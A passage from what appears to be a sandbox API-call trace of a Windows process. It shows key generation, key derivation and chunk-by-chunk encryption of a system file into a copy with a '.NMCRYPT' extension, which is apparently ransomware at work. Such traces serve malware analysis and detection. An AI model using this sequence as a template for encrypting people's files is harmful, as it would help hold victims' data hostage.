| out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.165] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.167] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.167] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.167] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0168.167] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.167] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad378) returned 1 [0168.167] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0168.167] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0168.167] wcslen (_String="\\\\?\\") returned 0x4 [0168.167] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2b8) returned 1 [0168.168] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.168] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.168] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=36352) returned 1 [0168.168] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0168.168] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.170] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.170] GetLastError () returned 0x0 [0168.170] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.171] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.172] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.172] GetLastError () returned 0x0 [0168.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.172] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.172] GetLastError () returned 0x0 [0168.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.172] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.172] GetLastError () returned 0x0 [0168.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.172] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.172] GetLastError () returned 0x0 [0168.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.172] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.172] GetLastError () returned 0x0 [0168.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.172] ReadFile (in: hFile=0x15b0, 